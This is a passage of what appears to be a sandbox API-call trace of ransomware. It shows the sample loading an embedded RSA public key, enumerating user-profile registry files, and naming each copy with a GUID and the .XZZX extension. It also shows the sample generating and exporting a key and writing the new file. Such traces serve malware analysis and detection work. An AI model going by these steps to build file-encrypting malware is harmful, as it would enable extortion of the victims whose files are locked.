f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0033.193] lstrcpyW (in: lpString1=0x3f8f460, lpString2="ntuser.dat.LOG1" | out: lpString1="ntuser.dat.LOG1") returned="ntuser.dat.LOG1" [0033.193] lstrcpyW (in: lpString1=0x3f8e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0033.193] SetErrorMode (uMode=0x1) returned 0x1 [0033.193] lstrcpyW (in: lpString1=0x3f8f860, lpString2="ntuser.dat.LOG1" | out: lpString1="ntuser.dat.LOG1") returned="ntuser.dat.LOG1" [0033.193] CoCreateGuid (in: pguid=0x3f8e440 | out: pguid=0x3f8e440*(Data1=0xbbae1f95, Data2=0x4acb, Data3=0x42b7, Data4=([0]=0x85, [1]=0x6b, [2]=0xc2, [3]=0xd7, [4]=0x47, [5]=0xf9, [6]=0x7f, [7]=0x4a))) returned 0x0 [0033.193] wsprintfW (in: param_1=0x3f8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned 49 [0033.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x3f8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0033.193] wsprintfW (in: param_1=0x3f8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\28341D27137DCD1DBBAE1F951776B165.XZZX") returned 71 [0033.193] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="XZZX") returned 0x0 [0033.193] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", dwFileAttributes=0x20) returned 1 [0033.193] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 91 os_tid = 0x7ec [0033.350] lstrcpyA (in: lpString1=0x3f8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0033.350] lstrcpyW (in: lpString1=0x3f8f460, lpString2="ntuser.dat.LOG2" | out: lpString1="ntuser.dat.LOG2") returned="ntuser.dat.LOG2" [0033.350] lstrcpyW (in: lpString1=0x3f8e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0033.350] SetErrorMode (uMode=0x1) returned 0x1 [0033.350] lstrcpyW (in: lpString1=0x3f8f860, lpString2="ntuser.dat.LOG2" | out: lpString1="ntuser.dat.LOG2") returned="ntuser.dat.LOG2" [0033.350] CoCreateGuid (in: pguid=0x3f8e440 | out: pguid=0x3f8e440*(Data1=0x11fba03f, Data2=0x7d5b, Data3=0x4b88, Data4=([0]=0xbb, [1]=0xc5, [2]=0x12, [3]=0xf0, [4]=0x52, [5]=0xab, [6]=0x5a, [7]=0x85))) returned 0x0 [0033.350] wsprintfW (in: param_1=0x3f8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned 49 [0033.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x3f8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0033.350] wsprintfW (in: param_1=0x3f8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\41B0B96524FC415811FBA03F28F525A0.XZZX") returned 71 [0033.350] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="XZZX") returned 0x0 [0033.350] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", dwFileAttributes=0x20) returned 1 [0033.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 92 os_tid = 0x844 [0033.506] lstrcpyA (in: lpString1=0x3f8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0033.506] lstrcpyW (in: lpString1=0x3f8f460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0033.506] lstrcpyW (in: lpString1=0x3f8e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0033.506] SetErrorMode (uMode=0x1) returned 0x1 [0033.506] lstrcpyW (in: lpString1=0x3f8f860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0033.506] CoCreateGuid (in: pguid=0x3f8e440 | out: pguid=0x3f8e440*(Data1=0x173e038f, Data2=0x6f4b, Data3=0x4a1f, Data4=([0]=0x8d, [1]=0xa2, [2]=0x47, [3]=0x88, [4]=0x9d, [5]=0x33, [6]=0xd9, [7]=0x4c))) returned 0x0 [0033.506] wsprintfW (in: param_1=0x3f8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 89 [0033.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x3f8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0033.506] wsprintfW (in: param_1=0x3f8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\B2B60BE520392815173E038F24320C5D.XZZX") returned 71 [0033.506] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="XZZX") returned 0x0 [0033.506] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", dwFileAttributes=0x20) returned 1 [0033.507] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 93 os_tid = 0x888 [0033.662] lstrcpyA (in: lpString1=0x3f8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0033.662] lstrcpyW (in: lpString1=0x3f8f460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0033.662] lstrcpyW (in: lpString1=0x3f8e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0033.662] SetErrorMode (uMode=0x1) returned 0x1 [0033.662] lstrcpyW (in: lpString1=0x3f8f860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0033.662] CoCreateGuid (in: pguid=0x3f8e440 | out: pguid=0x3f8e440*(Data1=0xbd5963fd, Data2=0x5d72, Data3=0x4ecb, Data4=([0]=0xa5, [1]=0xd6, [2]=0x4, [3]=0x1f, [4]=0xa0, [5]=0xec, [6]=0x3b, [7]=0xda))) returned 0x0 [0033.662] wsprintfW (in: param_1=0x3f8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 126 [0033.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x3f8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0033.662] wsprintfW (in: param_1=0x3f8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\CB216FAA1CC2D566BD5963FD20BBB9AE.XZZX") returned 71 [0033.662] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="XZZX") returned 0x0 [0033.662] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x20) returned 1 [0033.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 94 os_tid = 0x89c [0033.818] lstrcpyA (in: lpString1=0x3f8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0033.818] lstrcpyW (in: lpString1=0x3f8f460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0033.818] lstrcpyW (in: lpString1=0x3f8e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0033.818] SetErrorMode (uMode=0x1) returned 0x1 [0033.818] lstrcpyW (in: lpString1=0x3f8f860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0033.818] CoCreateGuid (in: pguid=0x3f8e440 | out: pguid=0x3f8e440*(Data1=0x53aa32fc, Data2=0x241f, Data3=0x47f5, Data4=([0]=0x92, [1]=0xc, [2]=0x77, [3]=0xf8, [4]=0xe9, [5]=0xab, [6]=0x40, [7]=0x2))) returned 0x0 [0033.818] wsprintfW (in: param_1=0x3f8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 126 [0033.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x3f8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0033.818] wsprintfW (in: param_1=0x3f8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\10C79C840A272AAB53AA32FC0E200EF3.XZZX") returned 71 [0033.819] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="XZZX") returned 0x0 [0033.819] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x20) returned 1 [0033.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 95 os_tid = 0x868 [0033.974] lstrcpyA (in: lpString1=0x3f8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0033.974] lstrcpyW (in: lpString1=0x3f8f460, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0033.974] lstrcpyW (in: lpString1=0x3f8e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0033.974] SetErrorMode (uMode=0x1) returned 0x1 [0033.974] lstrcpyW (in: lpString1=0x3f8f860, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0033.974] CoCreateGuid (in: pguid=0x3f8e440 | out: pguid=0x3f8e440*(Data1=0x43314afc, Data2=0x99bf, Data3=0x4405, Data4=([0]=0xbb, [1]=0xce, [2]=0x9a, [3]=0x79, [4]=0x2c, [5]=0xfb, [6]=0x2c, [7]=0x66))) returned 0x0 [0033.974] wsprintfW (in: param_1=0x3f8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 44 [0033.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x3f8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0033.974] wsprintfW (in: param_1=0x3f8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\97978E0428D9BCBB43314AFC2CD2A103.XZZX") returned 71 [0033.974] StrStrW (lpFirst="ntuser.ini", lpSrch="XZZX") returned 0x0 [0033.974] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", dwFileAttributes=0x20) returned 1 [0033.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c8 [0033.975] ReadFile (in: hFile=0x3c8, lpBuffer=0x34aa78, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0x3f8e418, lpOverlapped=0x0 | out: lpBuffer=0x34aa78*, lpNumberOfBytesRead=0x3f8e418*=0x14, lpOverlapped=0x0) returned 1 [0033.976] CloseHandle (hObject=0x3c8) returned 1 [0033.976] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4080000 [0033.976] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4090000 [0033.977] SetErrorMode (uMode=0x1) returned 0x1 [0033.977] lstrcpyW (in: lpString1=0x3f8e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0033.977] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ea5c8) returned 1 [0033.979] CryptGenKey (in: hProv=0x3ea5c8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324878) returned 1 [0034.102] CryptExportKey (in: hKey=0x324878, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x3f8e41c | out: pbData=0x0*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0034.102] CryptExportKey (in: hKey=0x324878, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4090000, pdwDataLen=0x3f8e41c | out: pbData=0x4090000*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0034.102] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0034.103] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0034.103] CryptDestroyKey (hKey=0x324878) returned 1 [0034.103] CryptReleaseContext (hProv=0x3ea5c8, dwFlags=0x0) returned 1 [0034.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\97978E0428D9BCBB43314AFC2CD2A103.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\97978e0428d9bcbb43314afc2cd2a103.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c8 [0034.103] WriteFile (in: hFile=0x3c8, lpBuffer=0x34aa78*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x34aa78*, lpNumberOfBytesWritten=0x3f8e438*=0x14, lpOverlapped=0x0) returned 1 [0034.104] SetFilePointer (in: hFile=0x3c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14 [0034.104] WriteFile (in: hFile=0x3c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0034.104] SetFilePointer (in: hFile=0x3c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0034.104] WriteFile (in: hFile=0x3c8, lpBuffer=0x3f8f860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3f8f860*, lpNumberOfBytesWritten=0x3f8e438*=0x14, lpOverlapped=0x0) returned 1 [0034.104] SetFilePointer (in: hFile=0x3c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: 